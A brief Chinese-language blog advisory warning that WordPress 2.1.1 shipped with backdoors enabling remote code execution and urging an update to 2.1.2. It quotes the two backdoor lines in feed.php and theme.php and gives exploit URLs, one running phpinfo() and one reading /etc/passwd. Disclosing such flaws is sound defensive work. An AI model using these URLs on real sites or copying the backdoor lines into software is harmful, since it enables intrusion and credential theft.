close
著名的部落格軟體 WordPress 2.1.1 有安全漏洞,可以輕易地執行遠端程式碼,請盡速更新至 WordPress 2.1.2

有問題的檔案:

  • feed.php: if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }

  • theme.php: if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }


如何利用此漏洞:

  • http://wordpressurl/wp-includes/feed.php?ix=phpinfo();

  • http://wordpressurl/wp-includes/theme.php?iz=cat /etc/passwd


受影響的版本:只有 2.1.1

至於詳細的資訊,請參考:

WordPress 2.1.1 Dangerous, Upgrade

WordPress source code compromised to enable remote code execution-----
arrow
arrow
    全站熱搜

    rogerspeaking 發表在 痞客邦 留言(0) 人氣()

    E-mail轉寄